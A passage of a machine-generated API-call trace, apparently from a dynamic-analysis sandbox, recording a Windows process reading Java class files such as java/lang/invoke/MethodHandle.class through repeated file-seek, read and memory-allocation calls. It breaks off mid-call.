SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341eaf9, lpNewFilePointer=0x208dd80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dd80*=54651641) returned 1 [0090.605] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dd50, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208dd50*=0xa0, lpOverlapped=0x0) returned 1 [0090.606] malloc (_Size=0x24) returned 0x2114050 [0090.607] free (_Block=0x21fe880) [0090.607] strlen (_Str="sun/reflect/FieldAccessorImpl.class") returned 0x23 [0090.607] strcpy (in: _Dest=0x208df00, _Source="sun/reflect/FieldAccessorImpl.class" | out: _Dest="sun/reflect/FieldAccessorImpl.class") returned="sun/reflect/FieldAccessorImpl.class" [0090.608] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3217556, lpNewFilePointer=0x208d980, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d980*=52524374) returned 1 [0090.608] ReadFile (in: hFile=0x134, lpBuffer=0x208d9d0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d950, lpOverlapped=0x0 | out: lpBuffer=0x208d9d0*, lpNumberOfBytesRead=0x208d950*=0x1e, lpOverlapped=0x0) returned 1 [0090.609] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3217597, lpNewFilePointer=0x208d9e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d9e0*=52524439) returned 1 [0090.609] ReadFile (in: hFile=0x134, lpBuffer=0x121b6240, nNumberOfBytesToRead=0x502, lpNumberOfBytesRead=0x208d9b0, lpOverlapped=0x0 | out: lpBuffer=0x121b6240*, lpNumberOfBytesRead=0x208d9b0*=0x502, lpOverlapped=0x0) returned 1 [0090.609] free (_Block=0x21129a0) [0090.610] free (_Block=0x2111ff0) [0090.611] strlen (_Str="sun/reflect/FieldAccessor.class") returned 0x1f [0090.611] malloc (_Size=0x48) returned 0x2112680 [0090.611] malloc (_Size=0xa0) returned 0x21fe880 [0090.611] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341eaac, lpNewFilePointer=0x208d2c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2c0*=54651564) returned 1 [0090.612] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d290, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208d290*=0xa0, lpOverlapped=0x0) returned 1 [0090.613] malloc (_Size=0x20) returned 0x21144a0 [0090.613] free (_Block=0x21fe880) [0090.613] strlen (_Str="sun/reflect/FieldAccessor.class") returned 0x1f [0090.613] strcpy (in: _Dest=0x208d440, _Source="sun/reflect/FieldAccessor.class" | out: _Dest="sun/reflect/FieldAccessor.class") returned="sun/reflect/FieldAccessor.class" [0090.613] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3217088, lpNewFilePointer=0x208cec0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cec0*=52523144) returned 1 [0090.613] ReadFile (in: hFile=0x134, lpBuffer=0x208cf10, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ce90, lpOverlapped=0x0 | out: lpBuffer=0x208cf10*, lpNumberOfBytesRead=0x208ce90*=0x1e, lpOverlapped=0x0) returned 1 [0090.615] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x32170c5, lpNewFilePointer=0x208cf20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cf20*=52523205) returned 1 [0090.615] ReadFile (in: hFile=0x134, lpBuffer=0x121b68e0, nNumberOfBytesToRead=0x491, lpNumberOfBytesRead=0x208cef0, lpOverlapped=0x0 | out: lpBuffer=0x121b68e0*, lpNumberOfBytesRead=0x208cef0*=0x491, lpOverlapped=0x0) returned 1 [0090.617] free (_Block=0x2114050) [0090.617] free (_Block=0x2111af0) [0090.637] strlen (_Str="sun/reflect/CallerSensitive.class") returned 0x21 [0090.637] malloc (_Size=0x48) returned 0x2111af0 [0090.637] malloc (_Size=0xa0) returned 0x21fe880 [0090.637] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341ea5d, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54651485) returned 1 [0090.637] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.638] malloc (_Size=0x22) returned 0x2114290 [0090.639] free (_Block=0x21fe880) [0090.639] strlen (_Str="sun/reflect/CallerSensitive.class") returned 0x21 [0090.639] strcpy (in: _Dest=0x208f380, _Source="sun/reflect/CallerSensitive.class" | out: _Dest="sun/reflect/CallerSensitive.class") returned="sun/reflect/CallerSensitive.class" [0090.639] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3216eea, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52522730) returned 1 [0090.639] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.641] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3216f29, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52522793) returned 1 [0090.641] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0x15f, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208ee30*=0x15f, lpOverlapped=0x0) returned 1 [0090.642] free (_Block=0x21144a0) [0090.642] free (_Block=0x2112680) [0090.643] strlen (_Str="java/lang/annotation/Annotation.class") returned 0x25 [0090.643] malloc (_Size=0x48) returned 0x2111ff0 [0090.643] malloc (_Size=0xa0) returned 0x21fe880 [0090.643] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341ea0a, lpNewFilePointer=0x208e740, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e740*=54651402) returned 1 [0090.643] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e710, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208e710*=0xa0, lpOverlapped=0x0) returned 1 [0090.644] malloc (_Size=0x26) returned 0x21140e0 [0090.645] free (_Block=0x21fe880) [0090.645] strlen (_Str="java/lang/annotation/Annotation.class") returned 0x25 [0090.645] strcpy (in: _Dest=0x208e8c0, _Source="java/lang/annotation/Annotation.class" | out: _Dest="java/lang/annotation/Annotation.class") returned="java/lang/annotation/Annotation.class" [0090.645] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3216d6b, lpNewFilePointer=0x208e340, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e340*=52522347) returned 1 [0090.645] ReadFile (in: hFile=0x134, lpBuffer=0x208e390, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e310, lpOverlapped=0x0 | out: lpBuffer=0x208e390*, lpNumberOfBytesRead=0x208e310*=0x1e, lpOverlapped=0x0) returned 1 [0090.646] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3216dae, lpNewFilePointer=0x208e3a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e3a0*=52522414) returned 1 [0090.646] ReadFile (in: hFile=0x134, lpBuffer=0x121b4c40, nNumberOfBytesToRead=0x13c, lpNumberOfBytesRead=0x208e370, lpOverlapped=0x0 | out: lpBuffer=0x121b4c40*, lpNumberOfBytesRead=0x208e370*=0x13c, lpOverlapped=0x0) returned 1 [0090.647] free (_Block=0x2114290) [0090.647] free (_Block=0x2111af0) [0090.652] strlen (_Str="java/lang/invoke/DirectMethodHandle.class") returned 0x29 [0090.652] malloc (_Size=0x48) returned 0x2111af0 [0090.652] malloc (_Size=0xa0) returned 0x21fe880 [0090.652] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341e9b3, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54651315) returned 1 [0090.652] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.653] malloc (_Size=0x2a) returned 0x2112d60 [0090.654] free (_Block=0x21fe880) [0090.654] strlen (_Str="java/lang/invoke/DirectMethodHandle.class") returned 0x29 [0090.654] strcpy (in: _Dest=0x208f380, _Source="java/lang/invoke/DirectMethodHandle.class" | out: _Dest="java/lang/invoke/DirectMethodHandle.class") returned="java/lang/invoke/DirectMethodHandle.class" [0090.654] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3212b61, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52505441) returned 1 [0090.654] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.656] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3212ba8, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52505512) returned 1 [0090.656] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x41c3, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0x41c3, lpOverlapped=0x0) returned 1 [0090.658] free (_Block=0x21140e0) [0090.658] free (_Block=0x2111ff0) [0090.669] strlen (_Str="java/lang/invoke/MethodHandle.class") returned 0x23 [0090.670] malloc (_Size=0x48) returned 0x2112680 [0090.670] malloc (_Size=0xa0) returned 0x21fe880 [0090.670] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341e962, lpNewFilePointer=0x208e7c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e7c0*=54651234) returned 1 [0090.670] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e790, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208e790*=0xa0, lpOverlapped=0x0) returned 1 [0090.671] malloc (_Size=0x24) returned 0x2114290 [0090.671] free (_Block=0x21fe880) [0090.671] strlen (_Str="java/lang/invoke/MethodHandle.class") returned 0x23 [0090.671] strcpy (in: _Dest=0x208e940, _Source="java/lang/invoke/MethodHandle.class" | out: _Dest="java/lang/invoke/MethodHandle.class") returned="java/lang/invoke/MethodHandle.class" [0090.671] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3210340, lpNewFilePointer=0x208e3c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e3c0*=52495168) returned 1 [0090.671] ReadFile (in: hFile=0x134, lpBuffer=0x208e410, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e390, lpOverlapped=0x0 | out: lpBuffer=0x208e410*, lpNumberOfBytesRead=0x208e390*=0x1e, lpOverlapped=0x0) returned 1 [0090.673] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3210381, lpNewFilePointer=0x208e420, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e420*=52495233) returned 1 [0090.673] ReadFile (in: hFile=0x134, lpBuffer=0x121b8e60, nNumberOfBytesToRead=0x27e0, lpNumberOfBytesRead=0x208e3f0, lpOverlapped=0x0 | out: lpBuffer=0x121b8e60*, lpNumberOfBytesRead=0x208e3f0*=0x27e0, lpOverlapped=0x0) returned 1 [0090.675] free (_Block=0x2112d60) [0090.675] free (_Block=0x2111af0) [0090.715] strlen (_Str="java/lang/invoke/MemberName.class") returned 0x21 [0090.715] malloc (_Size=0x48) returned 0x2111af0 [0090.715] malloc (_Size=0xa0) returned 0x121cab40 [0090.715] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341e913, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54651155) returned 1 [0090.715] ReadFile (in: hFile=0x134, lpBuffer=0x121cab40, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121cab40*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.720] malloc (_Size=0x22) returned 0x21143e0 [0090.720] free (_Block=0x121cab40) [0090.720] strlen (_Str="java/lang/invoke/MemberName.class") returned 0x21 [0090.720] strcpy (in: _Dest=0x208f380, _Source="java/lang/invoke/MemberName.class" | out: _Dest="java/lang/invoke/MemberName.class") returned="java/lang/invoke/MemberName.class" [0090.720] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x320c3e5, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52478949) returned 1 [0090.720] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.722] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x320c424, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52479012) returned 1 [0090.722] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x3f1c, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0x3f1c, lpOverlapped=0x0) returned 1 [0090.724] free (_Block=0x2114290) [0090.724] free (_Block=0x2112680) [0090.746] strlen (_Str="java/lang/invoke/MethodHandleNatives.class") returned 0x2a [0090.747] malloc (_Size=0x48) returned 0x2111c30 [0090.747] malloc (_Size=0xa0) returned 0x121cab40 [0090.747] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341e8bb, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54651067) returned 1 [0090.747] ReadFile (in: hFile=0x134, lpBuffer=0x121cab40, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121cab40*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.748] malloc (_Size=0x2b) returned 0x2112f60 [0090.749] free (_Block=0x121cab40) [0090.749] strlen (_Str="java/lang/invoke/MethodHandleNatives.class") returned 0x2a [0090.749] strcpy (in: _Dest=0x208f380, _Source="java/lang/invoke/MethodHandleNatives.class" | out: _Dest="java/lang/invoke/MethodHandleNatives.class") returned="java/lang/invoke/MethodHandleNatives.class" [0090.749] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3209aa8, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52468392) returned 1 [0090.749] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.751] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3209af0, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52468464) returned 1 [0090.751] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x28f5, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0x28f5, lpOverlapped=0x0) returned 1 [0090.752] free (_Block=0x21143e0) [0090.753] free (_Block=0x2111af0) [0090.763] strlen (_Str="java/lang/invoke/LambdaForm.class") returned 0x21 [0090.763] malloc (_Size=0x48) returned 0x2112680 [0090.763] malloc (_Size=0xa0) returned 0x121cab40 [0090.763] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341e86c, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54650988) returned 1 [0090.763] ReadFile (in: hFile=0x134, lpBuffer=0x121cab40, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121cab40*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.764] malloc (_Size=0x22) returned 0x2114050 [0090.765] free (_Block=0x121cab40) [0090.765] strlen (_Str="java/lang/invoke/LambdaForm.class") returned 0x21 [0090.765] strcpy (in: _Dest=0x208f380, _Source="java/lang/invoke/LambdaForm.class" | out: _Dest="java/lang/invoke/LambdaForm.class") returned="java/lang/invoke/LambdaForm.class" [0090.765] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3203433, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52442163) returned 1 [0090.765] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.767] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3203472, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52442226) returned 1 [0090.767] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x6636, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0x6636, lpOverlapped=0x0) returned 1 [0090.768] free (_Block=0x2112f60) [0090.768] free (_Block=0x2111c30) [0090.789] strlen (_Str="java/lang/invoke/MethodType.class") returned 0x21 [0090.789] malloc (_Size=0x48) returned 0x2111870 [0090.789] malloc (_Size=0xa0) returned 0x21fe880 [0090.789] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341e81d, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54650909) returned 1 [0090.789] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.790] malloc (_Size=0x22) returned 0x21144a0 [0090.790] free (_Block=0x21fe880) [0090.791] strlen (_Str="java/lang/invoke/MethodType.class") returned 0x21 [0090.791] strcpy (in: _Dest=0x208f380, _Source="java/lang/invoke/MethodType.class" | out: _Dest="java/lang/invoke/MethodType.class") returned="java/lang/invoke/MethodType.class" [0090.791] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31ff62a, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52426282) returned 1 [0090.791] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.792] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31ff669, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52426345) returned 1 [0090.792] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x3dca, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0x3dca, lpOverlapped=0x0) returned 1 [0090.795] free (_Block=0x2114050) [0090.795] free (_Block=0x2112680) [0090.811] strlen (_Str="java/lang/BootstrapMethodError.class") returned 0x24 [0090.811] malloc (_Size=0x48) returned 0x2112680 [0090.811] malloc (_Size=0xa0) returned 0x21fe880 [0090.811] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341e7cb, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54650827) returned 1 [0090.811] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.812] malloc (_Size=0x25) returned 0x2114260 [0090.813] free (_Block=0x21fe880) [0090.813] strlen (_Str="java/lang/BootstrapMethodError.class") returned 0x24 [0090.813] strcpy (in: _Dest=0x208f380, _Source="java/lang/BootstrapMethodError.class" | out: _Dest="java/lang/BootstrapMethodError.class") returned="java/lang/BootstrapMethodError.class" [0090.813] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31ff362, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52425570) returned 1 [0090.813] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.814] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31ff3a4, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52425636) returned 1 [0090.814] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x286, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0x286, lpOverlapped=0x0) returned 1 [0090.815] free (_Block=0x21144a0) [0090.815] free (_Block=0x2111870) [0090.817] strlen (_Str="java/lang/invoke/CallSite.class") returned 0x1f [0090.817] malloc (_Size=0x48) returned 0x2111870 [0090.817] malloc (_Size=0xa0) returned 0x21fe880 [0090.818] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341e77e, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54650750) returned 1 [0090.818] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.849] malloc (_Size=0x20) returned 0x21144a0 [0090.850] free (_Block=0x21fe880) [0090.850] strlen (_Str="java/lang/invoke/CallSite.class") returned 0x1f [0090.850] strcpy (in: _Dest=0x208f380, _Source="java/lang/invoke/CallSite.class" | out: _Dest="java/lang/invoke/CallSite.class") returned="java/lang/invoke/CallSite.class" [0090.850] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31fd503, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52417795) returned 1 [0090.850] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.851] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31fd540, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52417856) returned 1 [0090.851] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x1e22, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0x1e22, lpOverlapped=0x0) returned 1 [0090.852] free (_Block=0x2114260) [0090.853] free (_Block=0x2112680) [0090.860] strlen (_Str="java/lang/invoke/ConstantCallSite.class") returned 0x27 [0090.860] malloc (_Size=0x48) returned 0x2112680 [0090.860] malloc (_Size=0xa0) returned 0x21fe880 [0090.860] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341e729, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54650665) returned 1 [0090.860] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.860] malloc (_Size=0x28) returned 0x2113f30 [0090.861] free (_Block=0x21fe880) [0090.861] strlen (_Str="java/lang/invoke/ConstantCallSite.class") returned 0x27 [0090.861] strcpy (in: _Dest=0x208f380, _Source="java/lang/invoke/ConstantCallSite.class" | out: _Dest="java/lang/invoke/ConstantCallSite.class") returned="java/lang/invoke/ConstantCallSite.class" [0090.861] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31fd1be, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52416958) returned 1 [0090.861] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.861] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31fd203, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52417027) returned 1 [0090.861] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x300, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0x300, lpOverlapped=0x0) returned 1 [0090.862] free (_Block=0x21144a0) [0090.862] free (_Block=0x2111870) [0090.872] strlen (_Str="java/lang/invoke/MutableCallSite.class") returned 0x26 [0090.872] malloc (_Size=0x48) returned 0x2111870 [0090.872] malloc (_Size=0xa0) returned 0x21fe880 [0090.872] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341e6d5, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54650581) returned 1 [0090.872] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.872] malloc (_Size=0x27) returned 0x2114500 [0090.873] free (_Block=0x21fe880) [0090.873] strlen (_Str="java/lang/invoke/MutableCallSite.class") returned 0x26 [0090.873] strcpy (in: _Dest=0x208f380, _Source="java/lang/invoke/MutableCallSite.class" | out: _Dest="java/lang/invoke/MutableCallSite.class") returned="java/lang/invoke/MutableCallSite.class" [0090.873] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31fcd40, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52415808) returned 1 [0090.873] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.874] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31fcd84, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52415876) returned 1 [0090.875] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x43a, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0x43a, lpOverlapped=0x0) returned 1 [0090.875] free (_Block=0x2113f30) [0090.876] free (_Block=0x2112680) [0090.879] strlen (_Str="java/lang/invoke/VolatileCallSite.class") returned 0x27 [0090.879] malloc (_Size=0x48) returned 0x2112680 [0090.879] malloc (_Size=0xa0) returned 0x21fe880 [0090.879] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341e680, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54650496) returned 1 [0090.879] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, 